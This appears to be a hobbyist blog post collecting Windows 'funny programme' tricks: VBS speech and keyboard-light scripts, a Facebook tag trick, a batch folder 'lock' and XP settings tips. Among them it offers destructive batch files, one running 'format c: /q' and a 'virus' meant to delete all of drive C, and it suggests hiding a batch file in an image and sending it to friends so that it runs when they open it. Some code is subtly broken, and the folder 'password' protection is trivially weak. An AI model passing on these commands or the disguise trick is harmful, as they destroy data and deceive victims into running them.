Funny Programme

In my previous post you will see a funny programme so 
i will post one more post i thought my all friends like this 
post also

• First open Notepad and copy below codes

     Dim message, sapi
      message=InputBox("What do you want me to say?","I Love Hacking")
     Set sapi=CreateObject("sapi.spvoice")
     sapi.Speak message

• Now save the notepad file as talk.vbs
• Now close the notepad file and open it again.
• Done !!!

Funny Programme For Dancing The Key Board Lights



  1. Open notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.- See more

Facebook Number Tricks



Its Works

•Login to your Facebook Profile.
•Go to your profile link and there look for the ID number in the facebook URL.
•Copy the ID number and replace it in the following number
@+[ID:0:]
•Suppose 199500840125082 is the ID with which you want to replace the code. So your
code will be
@+[199500840125082:0:]
•Now ask your friends to copy/paste this code in the status or in comment section and
remove + sign from it, make it as @[199500840125082:0:]
•Then hit Enter and see the Magic.

REMOVE ANNOYING DELETE CONFIRMATION MESSAGES


Although not strictly a performance tweak I love this fix as it makes my machine 'feel'
faster. I hate the annoying 'are you sure?' messages that XP displays, especially if I have
to use a laptop touchpad to close them. To remove these messages:

1. Right-click on the 'Recycle Bin' on the desktop and then click 'Properties'

2. Clear the 'Display Delete Confirmation Dialog' check box and click 'Ok'

If you do accidently delete a file don't worry as all is not lost. Just go to your Recycle Bin
and 'Restore' the file.

For Formate Hard Drives

First open note pad and copy the the code given below

@echo off
format c: /q

===========


Just put the above text into notepad and save it with a .bat extension, for example
format.bat.
If C: is your main hard drive you'd want to create a boot floppy/CD/USB and run the
batch file from there.

/(The /q is only if you need a quick format)

bshivam67@gmail.com

For Set Password Without Any Software On Folder



STEP 1. Open Notepad and Copy code given below into it.

cls
@ECHO OFF
title
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto
UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

STEP 2.  Save the notepad file as lock.bat (.bat is must)
STEP 3. Now double click on lock.bat and a new folder will be created with name
MyFolder
STEP 4. Copy all your data you want to protect in that New folder
STEP  5. Now double click on lock.bat and when command promp appears Type Y and
press enter.
STEP 6. Now MyFolder will be hidden from you view, to access that folde double click
on lock.bat
STEP 7. It will ask for password enter your password and done. (Default password is
i love hacking)

FOR REMOVE PASSWORD FROM COMPUTER


1.Open your XP User Account control. To do this, click on Start, "Control
Panel," "User Accounts," "Change an account," then choose the user
account for which you wish to remove the password.

2.Select "Remove the password" from the list of options. You will be
prompted to enter the current password for the account selected.

3.Input the password and press "Remove password" (or hit Enter). Your
password protection will now be removed.

bshivam67@gmail.com

funny proframme

Itz time for sum FUN!!!

Check whether your computer iz a “male” or “female”?
1. Open Notepad
2. Type the following line in notepad:

CreateObject("SAPI.SpVoice").Speak"I love you"

3. Save file as"computer_gender.vbs"
4. Run the file. .

If you hear a male voice, your pc is a boy =p*
If you hear a female voice, your pc is a girl =D*
so,which 1 is urs....!!!???

HOW WE CREATE VIRUS

HOW WE CREATE VIRUS WHICH CAN CREATE 20 FOLDER,S IN ONE CLICK

>^_^< Then OS crash in 1 line code <^!^>

Come here for more funny tips -------->> Here is a funny one!
open notepad and write the following:

MD 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

Press Save as and save it e.g (Folders.bat)
this will create 20 folders if you write numbers upto 100 it will give you 100 folders. You
can also make folders with names, like this:

MD VIRUS DANGER INFECTED PC-BURN ERROR

and save it as anyname.bat

Funny thing is that you can actually hide this .bat file in an image (steganography

Technique ) then send it to your friend or anybody and when they click to view it will

create as many folders as you put in the file with names you select.

For Delete c drive full

For Delete c drive  full

create this virus using batch file programming. This virus will delete the C Drive
completely.

1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.

Warning: Please don't try to run on your own computer or else it will delete all the
content of your C Drive. I will not be responsible for any damage done to your computer.